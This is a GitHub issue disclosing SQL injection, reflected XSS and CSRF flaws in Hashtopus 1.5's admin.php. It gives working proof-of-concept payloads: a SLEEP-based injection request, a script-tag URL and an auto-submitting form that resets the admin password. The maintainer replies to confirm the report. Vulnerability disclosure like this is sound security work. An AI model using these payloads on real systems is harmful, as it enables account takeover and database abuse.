Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Hashtopus 1.5 Multiple Vulnerabilities #63

Open
ghost opened this issue Jul 26, 2017 · 2 comments

Comments

Projects
None yet
1 participant
@ghost
Copy link

commented Jul 26, 2017

SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:

     $format=$_POST["format"];
[...]
          $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");

Proof of concept:

POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=<valid_session_id>
Connection: close

name=ASD&format=0 or SLEEP(10)


Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting is present on line 2826 in admin.php:

[…]
name=\"return\" value=\"".$_SERVER['QUERY_STRING']." 
[...]

Proof of concept:
/hashtopus/admin.php?"><script>alert(123);</script>

CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.

<script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hashtopus/admin.php?a=config" method="POST">
      <input type="hidden" name="password" value="0wn3d" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
@curlyboi

This comment has been minimized.

Copy link
Owner

commented Dec 28, 2017

Hi. I didn't really bother with admin.php as long as user is authenticated...

@curlyboi

This comment has been minimized.

Copy link
Owner

commented Dec 28, 2017

But with the rest you are right :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.